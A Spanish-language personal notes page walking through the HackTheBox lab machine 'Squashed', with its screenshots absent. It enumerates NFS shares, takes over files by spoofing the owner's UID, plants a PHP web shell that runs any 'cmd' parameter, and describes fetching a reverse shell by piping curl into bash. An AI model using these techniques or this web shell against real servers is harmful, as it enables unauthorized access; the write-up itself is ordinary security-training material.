Notas de Luis

Máquina SQUASHED

Haremos los reconocimientos de nmap como siempre:

Vemos que tiene el puerto 80, por lo que hacemos un whatweb para conocer cómo funciona dicha web:

De todos modos en el escaneo de nmap vemos que tiene abierto el puerto 2049; y este puerto es importante auditarlo porque puede contener muchas vulnerabilidades:

Por tanto podemos acudir a la web de hacktricks para ver cómo se hackea a través de este puerto; y ponerlo en el buscador:

Y aquí nos explica como explotar vulnerabilidades del servicio NFS en el puerto 2049:

Y ahora en esta parte nos explican como consultar los recursos compartidos del lado de la máquina víctima que nos permita a nosotros montar en nuestro equipo atacante; y eso lo comprobamos con este comando showmount -e:

Lo probamos y nos encuentra dos recursos compartidos que nos lo podemos montar en nuestra máquina:

Por tanto con el comando mount vamos a montarnos estas dos carpetas y trasladarlas a nuestro equipo, donde por ejemplo en este caso nos traemos el recurso compartido /home/ross a un directorio de nuestra máquina llamado ross:

Y lo mismo con el otro recurso compartido:

Y ahora tenemos clonado estos dos directorios de la máquina víctima en nuestra máquina. Por ejemplo vamos a ver el contenido de la carpeta ross:

Y aquí dentro de la carpeta Documents nos encontramos con un fichero de keepas con extensión .kdbx:

Pero si inspeccionamos el fichero html, vemos que no tenemos permisos para entrar, ya que la carpeta es del usuario 2017:

Por tanto tenemos que cambiar el propietario de este directorio para poder entrar; y para eso vamos a crear un nuevo usuari con cualquier nombre; y después con el comando usermod podemos cambiar los atributos y decimos que el usuario 2017 ahora será el usuario que hemos creado antes, el usuario pepino; y ya tendremos permisos sobre el directorio html si somos el usuario pepino:

Nos logueamos como el usuario que acabamos de crear:

Tenemos que ejecutar una bash para poder ejecutar comandos:

Y dentro nos encontramos con este directorio:

Que si hacemos una prueba, vemos que está sincronizado con la web, ya que si creamos un fichero .txt, vemos que desde la web podemos acceder a él:

Vemos que el directorio que está montado se encuentra vinculado con el mismo directorio de la máquina víctima, por lo que en este punto podemos cargar un fichero php malicioso para conseguir ejecución remota de comandos: Consideraciones Previas (Código PHP malicioso para ganar Reverse Shell)

<?php
        echo "<pre>" . shell_exec($_REQUEST['cmd']) . "</pre>";
?>

Y ahora accedemos desde la web a este fichero php malicioso y obtenemos ejecución remota de comandos:

Ahora que tenemos ejecución remota de comandos, nos montamos un servidor web con Python que aloje el código que nos enviará una reverse shell:

Lo montamos:

Y ahora desde la máquina víctima hacemos un curl de este servidor web y lo pipeamos con bash; mientras nos ponemos en escucha con netcat:

computing/hacking/ctf/hackthebox/maquina_squashed.txt · Última modificación: por 127.0.0.1